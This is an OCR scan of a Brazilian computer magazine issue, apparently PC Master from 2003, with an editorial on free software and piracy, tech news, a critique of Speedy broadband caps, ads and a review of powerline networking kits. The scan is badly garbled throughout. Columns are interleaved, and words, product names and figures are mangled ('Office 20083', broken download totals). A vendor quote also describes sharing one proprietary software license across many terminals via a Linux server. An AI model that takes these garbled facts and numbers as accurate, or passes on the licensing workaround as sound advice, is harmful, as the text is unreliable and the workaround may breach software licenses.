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Atendimento pela metade não existe. Por isso, a Sonopress 
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Antes de usar os CDs 


Aprenda a utilizar esse 
servidor proxy/cache para 
aumentar a velocidade do 
seu acesso à Internet ....36 


Novo Speedy 

Mudanças nos planos de 
acesso do Speedy retomam 
o debate sobre a qualidade 
da banda larga no País ..36 


LAN pela rede elétrica 

Com esse equipamento ficou 
mais fácil e prático montar 
redes locais. Conheça as 
vantagens desse sistema .36 


Definity Linux 2.0 
Aprenda a instalar e usar a 
versão brasileira do Linux 
mais estável e seguro do 


mundo, o Slackware ...20 
Group Policy 


Office 2003 

Testamos o Office 20083. 
Saiba aqui se ele atende Um tutorial completo para 

às suas necessidades e se - você aprender a transmitir 
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Ao Leitor 


ualquer especialista em informática sabe que 

software livre nada tem a ver com pirataria. O 

problema é que há muita gente, e também muita 

empresa, interessada em vincular esses dois 
fenômenos de tecnologia. No entanto, é mais fácil vincular 
software proprietário com pirataria do que software livre, 
mesmo porque só se pirateia o que não é livre. O fato é 
que o software livre não pára de crescer e como ainda não 
encontraram algo realmente importante contra ele, ficam 
inventando dezenas de teorias para justificar a não-adoção 
de soluções Open Source. Assim que cair a ficha e 
perceberem que software livre e proprietário podem viver 
lado a lado, talvez a pirataria comece a diminuir. 

O ciclo da pirataria começa assim: quem não tem 
recursos e precisa usar um programa proprietário caro, 
sem alternativa livre, vai optar rapidamente pela cópia 
pirata. Mas a cópia pirata também tem custo. Alguém (um 
hacker talvez) precisa quebrar o sistema de segurança do 
software para permitir que ele seja copiado. Além disso, é 
preciso gravar a cópia e entregá-la. Tudo isso custa, já que 
o hacker precisa de dinheiro para viver e comprar 
computadores potentes e mídias para gravar as cópias. 
Essa primeira cópia torna-se a semente para novas cópias 
Com pirata pirateando pirata, cada vez fica pior, mais 
barato e também mais arriscado 

Com a alternativa do software livre, esse ciclo perde 
muito de sua força. Ainda mais se a alternativa for boa. 


PCMASTER 


Por que fazer pirataria se você tem uma alternativa 
livre? Nessa situação, se você tem recursos, pode 
inclusive optar pela solução proprietária, mas a pirataria 
fica em segundo plano. 

Sempre vejo dezenas de campanhas dizendo que 
milhares de empregos são perdidos por causa da 
pirataria. Que o governo perde em arrecadação. E que a 
pirataria ainda incentiva outros crimes. Concordo com 
tudo isso. Mas será que a melhor solução é assustar os 
piratas ou incentivar o software livre? O software livre 
gera muitos empregos também 

Uma empresa que adota sistemas livres precisa de 
especialistas nele. Para adotar o sisterna, a empresa 
precisa de consultores ou técnicos para instalar a 
solução. Talvez o hacker da pirataria seja o especialista 
do software livre. Tudo isso está gerando negócios e, 
consequentemente, mais arrecadação para o governo. 

E, repito, mesmo neste caso, o software proprietário 
continua sendo uma alternativa, às vezes mais cara, às 
vezes mais barata. O fato é que Livre e Proprietário ainda 
vão continuar brigando por muito tempo, e enquanto isso 
a pirataria vai levando a melhor. 

Nós, da PC Master, vamos manter você, prezado 
leitor, sempre muito bem informado sobre esta guerra. 
Como não sabemos quem vai vencer, o importante é 
estar sempre atualizado para saber como se virar em 
qualquer lado da trincheira. 
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Lançamento 


no mundo. Aqui você 


proct 


Chegam neste mês ao 
mercado brasileiro os 
primeiros computadores 
equipados com o novo 
processador AMD 64 bits. 
Uma máquina para poucos 


lançamento mundial 
aconteceu no final de 
setembro, mas o novo 
processador AMD Athlon 64 
bits começa a chegar definitivamente 
aos usuários brasileiros somente a 
partir de novembro. A comercialização 
de desktops equipados vom o novo 
processador no Pais será possível 
graças a uma parceria firmada pela 
AMD com a Itautec 
Para a coletiva de imprensa de 
lançamento do produto, a empresa 
preparou um vídeo cor 
cepomentos do hexacampeão 


AMD Athlon 64 
representa uma 
nova revolução 


mundial de F-1 Michael Schumacher 
e do piloto brasileiro Rubens 
Barrichello. A intenção era clara 
associar a tecnologia do AMD 
Athlon 64 com a velocidade dos 
carros da Ferrari. A comparação é 
justa. O novo processador da AMD 
desponta com uma qualidade 
surpreendente, apesar de ainda ter 
de esperar uma adaptação e 
desenvolvimento de softwares 

Mas outra comparação entre o 
AMD Athlon 64 e os carros da Ferrari é 
ainda mais plausível, Cobiçado por 
todos os fas do automobilismo, um 
carro esportivo da fabricante italiana é 


financeiramente inviável para a maioria 
das pessoas. E o mesmo pode-se 
dizer das máquinas equipadas com o 
AMD Athlon 64, Além do novo 
processador, os computadores da 
Itautec lançados em novembro têm 
uma configuração de 512 MB de RAM 
DDR 400 Mhz, HD de 80 GB e 7.200 
RPM, placa de vídeo ATI Radeon 9700 
de 128 MB de memória. DVD 18x, 
CD-AW 52x, monitor de 17 polegadas 
e Windows XP A Ferrari dos PCs não 
sai por menos de R$ 11 mil. Como o 
carro, é para poucos. 

A AMD sabe disso e, portanto. 
pretende reforçar a estratégia de 
vendas pós-lançamento para 
servidores de rede. A empresa espera 
conseguir colocar seu novo produto na 
casa dos usuários comuns no futuro 
direcionando seu foco, principalmente, 
em diversão. O desenvolvimento de 
games cada vez mais próximos da 
realidade e o cinema digital deverão 
ser o carro-chefe para isso acontecer. 
Um avanço que ainda deverá esperar 
um tempo para se tornar realidade 


Livre e público 


Governo federal adere ao Lil 


Ministério da Ciência e Tecnologia 
lança edital para software livre 


adoção do Linux nos sistemas 

do poder público parece 

realmente ser irreversível. O 

Ministério da Ciência e 
Tecnologia deu mais um passo na 
consolidação dessa nova política de 
software livre no governo federal, O 
ministério lançou dois editais que 
somam R$ 6,3 milhões para o 
desenvolvimento de programas abertos. 
O governo também assinou uma carta 
de inlenções com a IBM para incentivar 
o software livre no País. 

O objetivo é apoiar projetos de 
pesquisa aplicada ou de 
desenvolvimento científico com inovação 
tecnológica com foco no mercado 
global de tecnologia da informação em 
software livre. A meta é estimular o 


Legislativo 


Congresso debate software livre 


desenvolvimento de aplicações em 
Open Source, voltadas para governo 
eletrônico, educação, saúde, 
segurança, comércio eletrônico, 
geoprocessamento e entretenimento: 

No dia 29 de setembro foi lançado 
o primeiro edital, no valor de R$ 2,3 
milhões, que contará com recursos do 
CNPq (Conselho Nacional de 
Desenvolvimento Científico e 
Tecnológico). No final de outubro, um 
outro edital foi lançado. Desta vez, o 
contrato terá recursos da Finep 
(Financiadora de Estudos e Projetos) 
no valor de R$ 4 milhões. 


Deputados e senadores criam comissão mista para 
discutir a disseminação do sistema do pingúim 


exemplo do governo federal, 

os congressistas brasileiros 

também estão mais 

preocupados com a 
implementação do soitware livre em 
todo o País. Para discutir o tema com 
mais profundidade, o Congresso 
Nacional criou uma comissão mista 
formada por 125 deputados federais 
e 22 senadores. 

A Frente Parlamentar tem como 
propósito defender a utilização de 
programas que tenham código-fonte 
público. Um dos objetivos é forçar os 


governos municipais, estaduais e a 
União a utilizar cada vez mais os 
softwares livres em seus sistemas, 

A senadora Serys Slhassarenko 
(PI-MT) já apresentou no Senado um 
projeto de lei determinando que só 
serão utilizados programas de 
informática fechados se comprovada 
a ausência de programas livres 
capazes de suprir a necessidade da 
administração pública. São notícias 
importantes que prometem aumentar, 
e muito, a utilização dos softwares 
livres no Pais 
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Contra-ataque 


NAIDISG Emis 


Empresa utiliza a mesma alegação de infração de copyright; 
HP defenderá seus clientes Linux que forem processados 


m mais um capítulo da disputa 


Judicial entre a SCO e a IBM, 

um novo processo foi 

aberto na corte de Salt 
Lake City, nos Estados 
Unidos. Desta vez, a IBM 
acusa a SCO com as 
mesmas alegações pela qual 
foi proc a 

Segundo um 
comunicado da IBM 
distribuído. 
intemamente, a 
empresa afirma que 
a SCO viola seus 
direitos autorais ao distribuir 
as contribuições feitas ao sistema 
operacional Linux e que também 
viola a licença GPL sob a qual o 
Linux é distribuído. Com esse novo 
processo, a IBM lenta virar o joge 
guerra judicial iniciada pela SCO 
Quem também corre por fora 


nessa briga é a HP A empresa já 
anunciou que vai defender todos os 
seus clientes Linux que forem 
processados por infração dos 
direitos autorais. A medida, no 
entanto, é válida para os 
clientes que compraram 
servidores ou PCs com 
Linux a partir de 1º de 
outubro deste ano. A HP 
espera que a medida evite 
um temor de novos 
usuérios e que o 
processo ca SCO 
possa reduzir as 
vendas da empresa. 
Em resposta à decisão da HP a 
SCO disse, em comunic aficia 
que a atitude “reforça a idéia de que 
os usuários corporativos do Linux 
estão expostos a riscos legais”. Sem 
dúvida, essa é uma briga que ainda 
promete muitos capítulos 


E Lintows em espanhol HM Doação venerosa 


A expansão do Lincdows está indo a 
todo vapor. O erador do sistema 
operacional, Michael Robertson, 
tmesmo fundador da MP3,com, 
anunciou em meados ce outubro 
que o grograma já pode ser 
baixado em espanhol, Esse é o 
terceiro idioma em que o sistema é 
desenvolvido: Além do espanhol, o 
Lindows também está disponivel 
em inglês e japonês. A nova-versão 
do sistema inclu: O LindowsOS 4,0, 
browser er espanhol, programa 
de correio eletrêmico e mensageiro 
inslântaneo Universal, aém-de 
aplicativos de escritório e jogos: Na 
versão para download, o Lindows 
em espanhol custa USS 49,95. 


Bill Gates, dano da Microsoit, 
anunciou que irá aumentar as 
doações fetas pela Fundação 
que leva o seu nome e de sua 
mulher, Melinda Gates. para 
combater a AIDS na Índia Aq 
tado, serão US$ 200 milhões para 
prevanir a doariça naquele pais, O 
valor é o-dobro do que havia sido 
anunciado em novembro co ano 
passado. Número: | da Microsoft, 
Bil Gales é o homem mais rico. 
do mundo; De fevereiro ate agora, 
ele já lalurou US$ 6 dilhões. Com 
47 anos, Bill Gates mantém seu 
posteno lopo da lista dos mais 
tiços do mundo com urra fortuna 
de mais de US$ 46 bilhões. 


Terminal burro 


Pequeno, mas eficiente 


FIG do Brasil lança Thin Client com tecnologia 100% 
nacional. Uma boa alternativa para redes de baixo custo 


FIC do Brasil começou a 
produzir na pequena cidade 
de Santa Rita do Sapucaí, 
interior de Minas Gerais, um 
novo equipamento que pode ser 
mais um aliado dos 
softwares livres. 
Trata-se dos novos 
Thin Clients 
terminais burros 
de rede. O novo 
produto da 
empresa, que teve 
um investimento 
de US$ 1,5 milhão, 
é uma boa opção 
para quem quer 
criar uma rede na 
qual os usuários 
não necessitam 


Modelo Gênisis 2: 
economia em rede 


de uma máquina com todos os 
recursos de PC. Os novos Thin 
Clients são compostos apenas de 
uma placa-mãe e um processador, 
Com isso, os novos equipamentos 
saem por US$ 220, sem monitor. 

O diretor comercial da FIC, Cláudio 
Ribeiro, ainda dá uma dica para quem 
quiser economizar com os softwares 
proprietários. Segundo ele, é pos: 
que todos os usuários acessem esse 
tipo de programa, mas com apenas 
uma licença para a rede. Para isso, 
basta que todos os terminais estejam 
ligados a um servidor Linux, que estará 
ligado a um servidor-proprietário. 
Assim, Os terminais não precisam de 
licença, pois, na prática, estão ligados 
a um servidor Linux 

Os Thin Clients da FIC foram 
adotados pelo governo mineiro para 
colocar em prática o programa de 
inclusão digital no Estado. 


ME Menor prosonelo Fal 
Um menor, suspeito de ter criado e * 
propagado pela Intemet um vitus-de 
nome RPCSDROT, for preso pelo FBI 
em Scatte, nós Estados Unidos. Por 


razões legals, sua identidade não foi» 


revelada. Oliver Frledrichs: analsia da 
“Symantoc, fabricante de antivírus, - 
“acha que à vírus é uma vanante do 
co MSBlast, que desde agosto vem 
“provocando danos à redes 
“corporativas em todo o mundo: O. 
= promotor público Jorn McKay disse 
= que tos hackers têm de entender que 
“Blês sórão caçadas & responderão 
poór-seus atos, quer eles 
adultos ou menores: ED segundo 
menor preso acusado de propagar. 
virus na Internet. 


HE Congresso de Soitwaro Livro 
Os adeptos do software livra no: 
Brasil terão mais uma boa 
dporunidade para debater os 
avanços e tendências do Open 
Source no Pais, No-cilas 8 e 9 de 
novembro, acontece na Escola 
Politécnica da USP (Universidade 
de São Paulo) o Canisll 
(Congresso Internacional de 
Software Livre). O evento terá 
diversas palestras técnicas e 
debates sóbre o luturo do 
sistoma no Pais: O Conisll espera. 
reunir um público de 1,5 mil 
pessoas, A abertura do 
Congresso ficará por conta do 
ministra da Ciência & Tecnologia, 
Roberto Amaral | 
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Justiça 
Microsoft é processada por falhas de segurança 


Advogada norte-americana alega que a supremacia dos sistemas de Bill Gates coloca 
em risco redes de computadores em todo o mundo, mas ação não deve ter resultados 


s recentes problemas de entendimento para um usuário leigo, 
segurança apresentados em deixando, assim, sua máquina mais 


softwares da Microsofl vulnerável a ataques de hackers e a 
poderão gerar transtornos proliferação de vírus 
judiciais para a empresa, À Procurados pela imprensa 
advogada Dana Taschner, de norte-americana, os advogados da 


Newport Beach, nos Estados Microsoft não quiseram se pronunciar 
Unidos, entrou com uma ação a respeito do caso. No entanto, hã 


coletiva alegando que a supremacia poucas chances de a empresa ter 
dos sistemas operacionais de Bill uma decisão desfavorável na Justiça 
Gates tem colocado em risco a No contrato de licenciamento dos 
segurança de redes de produtos, inclusive o do Windows, há 
computadores em todo o mundo. cláusulas que livram de forma 
) A advogada alega ainda que os antecipada a empresa de muitas das 
4 bugs são complexos e de dificil acusações feitas contra ela 
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Macintosh sa e 


Annie tem novo sistema 


Versão 10.3 do Panther chega ao mercado com mais 
de cem novos recursos e deve custar cerca de US$ 130 


novo sistea operacional 
para Macintosh chegou 
mercado no úllimo dia 24 de 
outubro cheio de inovações 
e avanços. São mais de cem novos 
recursos. Entre as novidades 
estão o Expose, um recurso que 
permite ao usuário visualizar todas 
as janelas abertas simultaneamente, 
a iChat AV, um sistema de 
mensagens instantâneas com 
suporte para videoconferência, e a 
ferramenta de navegação Finder 
totalmente redesenhada 
O novo Fincer ainda irá permitir o 
uso de diferentes cores para 


organizar os documentos e 
navegação dinâmica para servidores 
de arquivos Mac, Windows & Unix, 

O sistema baseado no Unix será o 
último desta versão a ser lançado pela 
empresa, Segundo a Apple, ele virá 
com mais da 150 novos recursos, 
incluindo ferramentas de administração 
de redes aprimoradas. Além disso, a 
empresa também inclui suporte para o 
Samba 3 neste sistema. 

A Apple também atualizou o 
programa de calencário iCal e o 
iSync, usado para compartilhamento 
de dados entre o Mac e dispositivos 
móveis, como celular e palmtop, 


Screenshot do mês 


| Mostre você também a cara do seu PC. 

| Envie a captura do seu Desktop para 
pemasterMeuropanet.com.br e apareça 
aqui na próxima edição da PC Master. 


Sulamita Garcia: 
toskinhaQnoisemakers.org 
Sistema Operacional: 

Slackware 9.1 com Windowmaker 


RuriLinux 
peida ndo 


Os sistemas operacionais da 
Apple serão vendidos pelas lojas da 
empresa na Intemet e em suas 
revendas. A empresa começou à 
aceitar pedidos em sua loja virtual 
desde o início do mês de outubro. O 
preço médio co novo sistema 
operacional da Apple deverá ficar em 
torno de US$ 130. 


Agora é a hora 
de encher o carrinho! 


A Linux Mal já está na clima, são muitas novidades 
e promoções esperando por você 


Gabinate Simple 101 


a. destaques: 
irewalis em Linux pf Pequenas Comparações 
DVD Matrix Raloadad Fuliscreen 


Recordes fla Internet 


Kernel 


Marcelo Tossati está na Cyclades 


Mantenedor do Kernel deixa a Conectiva, mas garante que 
não mudará seu trabalho no desenvolvimento do Linux 


Cyclades deu mais um passo 

importante para se 

consolidar definitivamente 

como uma das principais 
empresas de hardware que 
estimuiam o desenvolvimento de 
sistemas Linux no País. Para isso, 
anunciou recentemente a 
contratação de Marcelo Tossati, o 
brasileiro que é mantenedor do 
Kernel 2.4 desde 2001 e um dos 
principais nomes da comunidade ce 
software livre do mundo 

A função ce Tossati na Cyclades 
será a de atuar na área de P&D como 
desenvolvedor, colaborando para 
embarcar o Linux nas soluções da 
empresa. Para assumir seu novo 
posto, o mantenedor do Keme! 2.4 
deixou suas atividades na Conectiva 
umas das principais empresas de 
desenvolvimento de sistemas 
operacionais Oper Source do Brasil e 
da América Latina. 

Tossati garante, no entanto, que 
sua mucança da Conectiva para a 
Cyclades não vai alterar em naca o 
lrabalho que desenvolve como 


mantenedor do Kernel 2.4, "E um 
trabalho separado que não está 
influenciado por nenhuma empresa,” 

O Kernel é o coração do sistema e 
cade a lossali decidir o rumo da 
versão, analisando e selecionando 
correções sugeridas por mais de 300 
desenvolvedores do mundo todo. 

A notícia de sua contratação pela 
Cyclades chegou a assustar alguns 
adeptos do software livre por se tratar 
de uma empresa de hardware, mas 
aos poucos o clima foi se acalmanco 
e não há mais dúvidas de que o 
desenvolvimento do Kernel continuará. 


Treinamento em Software Livre 
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LIVROS 


Projetos de sistemas web 
orientados à interface 
Rosângela Hickson — 192 páginas 
R$ 49,00 — Editora Campus 

Com o objetivo de lomecer ferramentas oara que 
desenvolvedores sam projetar sites campeões de audiência, 
este livro apresenta os conceitos e 
com os usuários em sistemas computacionais para Web, com 


as de inte 


pais estilos de interface, técnicas de inter 


s de desenvolvimento a Implementação. 


Guia completo de cabeamento de redes 
José Maurício S. Pinheiro - 264 páginas 

R$ 53,00 — Editora Campus 

forma simples e objetiva as civersas 
cabeamento de redes. O 
obre os sistemas 


s relacionadas aos projeto: 


senta várias informações p 


de cabeamento estruturado, incluindo características básicas 


dos cabos « ace: mais utilizados, normas e lécncas 
empregadas na instalação, além de orem 


cetalhes técnicos para elaboração dos projetos. 


's sobre os 


INTRODUÇÃO AO 


C++ 


Introdução ao €++ 
Peter Jandl Junior — 336 páginas 
R$ 45,00 — Editora Futura 

Este livro fol desenvolvida para ser um material introdutório 
sobre o C++, abordando os conceitos básicos de programação 
e orientação a objetos. O lino apresenta o C+— e sua sintaxe 
leitor possa aproveitar os lundamentos também 


de forma que o 
para 
ambiente Windows como Unix. No total, são mais de 170 
exemplos fornecidos imtegralmante, testados um a um 


G, Todos os exemplos são trabalhados tanto em 


CURSOS E EVENTOS 


Limux - Fundamentos do Sistema 
10/11 a 14/11 - 40 horas | 
Impacta - R$ 600 

Conesitos de administração do 
sistema Linux e gerenciamento de 
contas-de usuários e sistemas de 
arquivos e automação de tarefas, 
Ay. Paulista, 1.009 - 9º andar - SP 

fel; (11) 3285- 5566 

ww irrpacta com.br 


30 e 31/10 - 16 horas 

Dextra - R$ 880 

Prover ao aluno os conhecimentos 
e habilidades fundamentais para à 
utilização e administração do 
servidor de aplicações J2EE JBoss. 
R. Lauro Vannucol, 102, Campinas -SP 
Tel. (19) 3256-8644 // 3256-6722 
vimwdextra comibr 


UML, Anátiso de Renuísitos 
Utilizando Cases de Uso 
1e2/12 - 16 horas 

ITCOM - R$1.180 
Formação de profissionais de 
desenvolvimento de sistemas de 
software, em diversos níveis. 
Rua Demóstenes, 748 - SP 

Tel. (11) 5096-6682: 

wanuitcom com.br 


ntre 
1 Teixeira da Silv 


3589.0108 - contate 


CURSO DE LINUX 
SEM SAIR DE CASA? 


Aprenda com quem já treinou milhares de profissionais 


e foi a pioneira .em treinamento de Linux à distância 


que pode, inclusive, ser feito em máquinas Windows! 


Inventive House 


Conheça também o Curso de "Vulnerabilities Exploitation” 
à distância e aprenda a se proteger de invasões! 


SLINUIX, 


am contato conosco 
1, 660 - 6 


Paraiso x. Metrô Brigadeiro 


www.Slinux.com.br 


andar 
Dálinux.com.br 


YOUR INTELLIGENC! 


www. GLINUX.T 


IN LINUX 


OM. 


BR 


=) Banda larga 


A guerra continua 


Mudanças no plano de acesso da maior operadora de banda 
larga do País aumentam as críticas sobre a qualidade do 


serviço no Brasil, que conta com quase 1 milhão de clientes 


do Speedy (ac 
vendido pela Te 
São Paulo) acirraram ain 
criticas da Abusar 


de Acesso Rápido) con 


operadoras de banda larga 
brasileiras, A entidade, única 
epresentante c 
de alta velocidade e 
as limitações ce download impostas 
pelo Speedy irão prejudicar a maioria 
dos usuários do sistema: 


A partir de agora, quem assinar o 
Speedy terá de optar por um dos três 
planos de velocidade e limitação de 
download, Por enquanto, os usuários 
antigos podem permanecer com seus 
pianos ou migrar para um novo 

O presidente da Abusar, Horácio 
Beifor:, avalia que o teto de 3 GB do 
do Speedy, que permite 
idade de navegação de, no 
máximo, 300 Kbps, será insuficiente 
para boa pa: jos usuários que 
fizerem essa opção de serviço, "São 
mudanças 
consumidor contra os 
Interesses dos usuários", diz Belfort 
Para ele, há ainda um outro 
complicador. O presidente da Abusar 
avalia que com as novas condições, 
utilizar conexão rápida pode até 
mesmo pel o sentido em alg 
Às pessoas usam para 
download. Se não podem fazer 
download, não têm motivo para ter 
banda larga”, declara. 

O Speedy conta atualmente com 
mais de 400 mil cli (dados da 
Telefônica), e a controladora do 
iço alega que as mudanças não 
vão trazer prejuízos à maioria de seus 
usuários. Segundo dados divulgados 

slofônica, apanas 5% deles 
teriam problemas de adaptação aos 
novos contratos de prestação de 
serviço. O Speedy alega que esses 
n 60% da infra-estrutura 


5% cor 


As mudanças nos planos do 
Speedy são válidas autornaticamente 
para os novos clientes, Para os 
usuários antigos que já possuem o 
serviço, existe a opção de migrar para 
os novos pacotes ou permanecer com 
o contrato atual. Para você saber se à 
mucança vale a pena, a Telefônica 
promete colocar à disposição de seus 
cliantas uma lerramenta para mecir 
quanto de download o usuário faz por 
mês (até-o fechamento da edição esse 
recurso não estava disponível para os 
usuários antigos) 


A Telefônica divulga em sua página 
uma estimativa ca quantidade de coisas 
que um usuário do Spesdy 300 (3 GE 
de limite) pode coptar peia rede: 

* camegar 10 mil páginas Web 

* download ce 300 músicas 

* cownload de dez trailers de filme 
* receber 3 mi e-mails 

* recober 7,5 mil arquivos de Woro 
* jogar 24 horas de game oniine 

* download de cem programas 


!sso significa que » Speedy 300 
permite fazer 08 seguintes downloads: 


* $0 mil páginas Web com 100 Kb (uma 
página de busca do Google) - 1 GB 

* 500 músicas de 2,15 MB (um MP3 
médio de 2 min) = 645 ME 

* Dez trailers ce time de 20 ME - 200 MB 

* 3 mile-mais de 10 KB = 30 ME 

* 1,5 mil arquivos de Word de 50 KB — 
76 MB (arquivo minúsculo de Word) 

* 24 horas de game online (por exemplo, 
Counter-Strike) - 320 MB 


Com isso, restariam 730 MB para os 
cem programas, Assim, cada um dessas 
prógramas taria apenas 7,3 ME. 
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PC Master 15 


Compre 3 edições e 


anhe 10% de desconto 


As melhores e mais baratas distribuições Linux) 


Ed. 77 - R$ 15,” 


Canil, 263: LinuxCo 
o e em português s 
om guia prático de fam 
instalação na revista 


Ed. 76 - R$ 13,2% 
iva 9 CD 1: FreeBSD 5, 0 
sistema Unix li 


=CD 2: Peanut 9. 
compacto mais vi 
rápido 


indows não 
ira os truques qu 
perts em Win 2003 
conhecem. Tem até como 
estourar “na unha” a senha do 


CDS 1,263: Linux 


Ed. 73 - R$ 14,” 


CDS |, 263: Linux 


pode montar uma iguração para deixar 
sem fio conectando até XP rodar em 
128 computadores. máxima 


SET. 
Ed. 74 - R$ 12,º 
«CD 1: Kurumin 1.4, 0 
inux brasileiro mais 
esejado da atualidade, e 
nbém o pacote Kokar 


administradores ce rede 


Como fazer redes Linux e 
Windows conversarem 


TER 


r PCMAS! 


Ena 


en 


CD 2: videoaulas que 
ensinam a instalar e 
configurar três distribuições 


la especial: como. 
nar o dlisco rigido 
de forma eficiente 


Ligue agora e peça suas edições: (11) 3038-5050 


Entre na onda da Internet de banda larga 


Ed. 4- R$ 7,” Ed.3- R$7,” 
uWebcams ao vivo: guia =15 opções de jogos mUso todo o poder da 


completo com 35 você se banda larga para 
webcames gratuitas, divertir usando sua N e filmes conseguir antivírus, 


sobre diversos assuntos Intemet de banda larga eiros, até com Es livros, fotos, mi 
n 4 legem jogos e muito mais 
=Bancos online: saiba mDicionários online cabia a 


usar com toda a linguas e termos mAprenda inglês sem s: =Guia completo para 
segurança os servidores com consulta ões de saber como ter a Intornet 
online do seu banco banda larga em casa 


cursos onl 


Preencha este cupom (original ou cópia) e envie-o para o fax: 
(11) 3097-8583 ou para a Rua MM.D.C., 121 - 05510-021 - São Paulo - SP 


É Confirme o valor do frete polos telefones; 
! (11) 3038-5050 ou 0800 55 76 67 


Escolha a forma de pagamento: 
D Cartão de Crédito: Da vi 03X sem juros 
orizo o débito de R$, no meu cartão: 
Jamex ( JCredicard ( JDiners ( )Visa ( Mastercard mês ano 


DOI! [ OO DODO Ex 


E número completo conforme o verso do cartão — 1] validade 


pras É 
í 1 
Passo a Passo 


u106 programas para mAprenda Windows e 
resolver e prevenir entre para o mundo 
problemas de qualquer PC formática 


TJ Envio de Chequels) via Correios:  Mávista [3X sem juros 
Envie pelo Correio o(s) cheque(s) cruzedo(s) e nominalis) à Editora Europa 


O Depósito Bancário: [somente pagamento à vista 
Faça um depósito no banco Bradesco (conta 221.978-8, agência 0104-0) ou 


no ltaú (conta 64469-0, agência 0265) e envie o comprovante de depósito 
junto com este cupom para o nosso fax: (11) 3097-8583 


Coloque aqui os seus dados: 


Nome: 
Endereço: 
“- E Bairro: CEP: 
10.001 cliparts impressos 810.000 cliparts e 1.000 Profissão: Data de nasc. / / 
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O Hardware 


Rede Local nela 
Rede Elétrica 


onectar computadores em 
rede está cada vez mais 
fácil. E os transtornos com 
extensos cabos pocem estar 
com os dias contados, Graças a uma 
nova tecnologia que já está 
ganhando força no Brasil, tornou-se 


SpeedStream 


ME FABRICANTE 


SpeedStream 


HINFoRMAçÕES 


www pointe 


Preço 
SpeedStream SS2510 (Master) 
US$ 261,00 
SpeedStream S52521 (Wi-Fi) 
US$ 300,00 
SpeedStream SS2502 (RJ-45) 
USS 165.00 
SpeedStream SS2501 (USB) 


Uss 177,00 


PO Mastor 


possível conectar computadores 
através da rede elétrica. Isso mesmo, 
usando os mesmos “cabos” que 
levam energia ao PC, é possível 
transferir dados. E a PG Masler :estou 
um conjunto de acessórios da 
SpeedStream que realizam essa 
tarefa e já estão à venda no Pais 

Esse novo sistema para redes 
ocais utiliza uma tecnologia chamada 
PLC (Power Line Communication) 
Essa tecnologia funciona com um 
Master PLC, equipamento responsável 
por enviar uma nova frecúência, que 
varia de 4.3 Mhz para até 20,9 Mhz, à 
rece elétrica. Para conectar os PCs 
em rede, é necessário o Modem PLC, 
respor ei por receber e converter 
os dados enviados pelo Master. 

E; sistema, porém, só poce ser 
usado em uma rece elétrica loc 
seja, somente quando os PCs estão 
ligados a uma mesma caixa de força. 
Como € sistema envia uma nova 
frequência à rede elétrica, a 
transferência de dados é feita sem 
interferir nos demais equipamentos 

A velocidade da rede é fornecida 
pelo Master PLC e pode variar de 
2 Mbits até 45 Mbits, dependendo do 


Testamos o sistema 
de transmissão de 
dados pela rede de 
eletricidade. Conheça 
suas vantagens e 
pontos fracos 


modelo do equipamento. A única 
limitação fica por conta da 
disponibilidade da rede ao conectar 
vários Modems PLC. Isso porque ela 
é dividida entre os usuários por igual 
Portanto, se dez computadores 
estiverem conectados a um 
equipamento com suporte a 

14 Mbits, cada usuário terá uma 
velocidade de apenas 1,4 Mbits 


Dados na rede elétrica 

Para conectar os computadores à 
rede, existem duas opções de 
instalação dos equipamentos: A 
primeira é através de um cabo ligado 
diretamente no computador e a 
segunda é via rede sem fio (wireless) 

O Modem PLC com suporte a 
cabo possui dois tipos de conectores 
USE 1,1 e RJ-45. No modelo com 
suporte a RJ-45 (SpeedStream 
852502) é necessário que o 
computacor já tenha uma placa de 
rede instalada, No modelo USB 1,1 
(SpeedStream SS2501), a conexão é 
feita diretamente pela porta USB, 
evitando o uso de uma placa de rede. 

Já com o modelo Wireless 
(SpeedStream 882521) é necessário 


que o computador que receberá os 
dados tenha suporte à 
Wi-Fi (802,11b de 2.4 GHz). Para 
completar, a distância máxima entre 
um Modem PLC e outro é de 300 
metros: já para c Master PLC é de 
até 900 metros. 

Para o teste, utilizamos os 
Modems PLC com suporte a RJ-45 e 
USB 1.1 e 0 Master PLC com 
roteador (SpeedStream 382510) 

A configuração e instalação do 
Master é simples. Se você não deseja 
fazer qualquer alteração, basta 
conectar uipamento diretamente 
à rede elétrica, Isto é, piugá-lo em 
uma tomada. Você também pode 
lo a um computador através 


suporte de roteamento da Internet 
Nos computadores que receberão 
o Modem PLC com suporte a RJ-45 
onectar o modem na tomada 
e 0 cabo de rede do 
equipamento ao computador. Depois, 
no Windows, basta ativar a opção 
Obter o IP automaticamente. Isso 
porque o Master PLC já possui 


Conexão pode ser 
feita pela porta USB, 
RJ-45 ou Wi-Fi 


servidor DHCP para distribuir os 
endereços de IP peia rede. 

Com o Modem PLC que utiliza a 
porta USB, a configuração é um 
pouco diferente. E necessário 
configurar o computador para 
reconhecer o dispositivo como placa 
de rede, Com o soft que 
acompanha o produto, a 
configuração é feita automaticamente 
para os sistemas Windows 98SE, 
2000, ME ou XP Depois de instalado, 
basta ativar o reconhecimento de 
endereço IP no sistema 

Para monitorar a velocidade de 
acesso ou saber de qual dispositivo 
Master PLC seu equipamento está 
fazendo parte, existe um software 
especial que acompanha o kit Além 
de medir a velocidade, é possível 
saber a qualidade nexão que 
você está recebendo, já que pode 
haver perda de pacotes em alguns 
casos. Esse fator depende da 
estrutura da rede elétrica em que o 
equipamento está conectado. Para 
funcionar corretamente em sua 
velocidade máxima, os equipamentos 
não podem ser ligados a um fiiro de 
linha ou estabilizador. 


Equipamentos acabam com os fios 
nas ligações das redes locais 


Ampliação da rede 

O sistema PLC também pode ser 
utilizado vara ampliar a capa 
cas redes convencionais sem precisar 
fazer qualquer tipo de mudança nº 
equipamentos já instalados. Para 
a conectividade entre os dois tipos 
sistemas (rede elétrica e rede 
elhemet), utilizamos o Master PCL com 
suporte a roteador. Basta ligar um 
cabo da rede etnemet convencional ao 
Mastear para colocar o roteador na 
rede, Isso permite que as máquinas 
conectadas nas duas redes (elétrica e 
ethemet) se comuniquem 

Outra aplicação interessante é o 
compartilhamento de acesso à 
Internet. Para fazer a distribuiçã 
dados. o PLC Master não exige um 
computador dedicado, Com o 
SpeedStream SS2510, basta ligá-lo 
ao modem de acesso à Internet (no 
caso de acesso banda larga, por 
exemplo, no modem ADSL) para que 
todos os usuários da rede PLC 
possam acessar a Internet 


Segurança e Conclusão 

Se você deseja ativar uma senha 
para conectar os equipamentos à 
rede, o roteador já traz esse recurso, 
Além da senha, as informações são 
criptografadas em 56 bits 

A grande desvantagem do 
sistema é mesmo o preço. Por ser 
uma tecnologia cara, os acessórios 
PLC são recomendados para 
escritórios ou empresas que desejam 
aumentar a rede sem ter de passar 
